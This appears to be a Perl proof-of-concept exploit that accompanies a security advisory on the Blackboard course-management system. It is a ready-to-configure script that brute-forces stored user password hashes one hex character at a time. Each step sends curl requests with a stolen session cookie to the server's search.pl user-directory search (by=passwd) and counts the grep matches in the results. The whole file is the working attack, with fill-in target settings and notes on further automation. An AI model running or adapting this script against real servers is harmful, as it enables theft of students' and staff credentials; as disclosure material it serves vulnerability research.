#!/usr/bin/perl -w

#
# Blackboard Password Extractor
#
# pedram amini <http://pedram.redhive.com>
#
# - refer to the advisory for usage.
# - requires curl.
# - can be easily further automated.
#

# set these:
$password   = "abcd";                   # initial "narrow down" password.
$session_id = "\@\@123456abcd....";     # current valid session id.
$host       = "blackboard.xxxxx.xxx";   # target blackboard server.
$grep_for   = "lastname";               # target we're looking for.

# don't forget to comment out either the working forwards or backwards lines.

@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
          '8', '9', 'a', 'b', 'c', 'd', 'e', 'f');

$url = "http://$host/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=MEOW&keywordraw=_SENTINAL_&by=passwd";
$url =~ s/&/\\&/g;

for ($keep_looking = 1; $keep_looking != 0; ) {
    for ($i = 0; $i <= $#chars; $i++) {
        # working forwards:
        #$cur_pass = $password . $chars[$i];

        # working backwards:
        #$cur_pass = $chars[$i] . $password;

        $cur_url  = $url;
        $cur_url  =~ s/_SENTINAL_/$cur_pass/;

        print "\n --> working  ... $chars[$i]";

        $return = `curl --cookie session_id=$session_id $cur_url 2> /dev/null | grep -i $grep_for | wc -l`;
        $return =~ s/\s//g;

        print "\n --> returned ... $return";

        if ($return) {
            print "\n --> next char found: $chars[$i]";

            # working forwards:
            #$password .= $chars[$i];
            
            # working backwards:
            #$password = $chars[$i] . $password;
            
            
            $keep_looking = 1;
            $i = $#chars;
        } else {
            $keep_looking = 0;
        }

        sleep 1;
    }
    print "\n --> current password ... $password";
}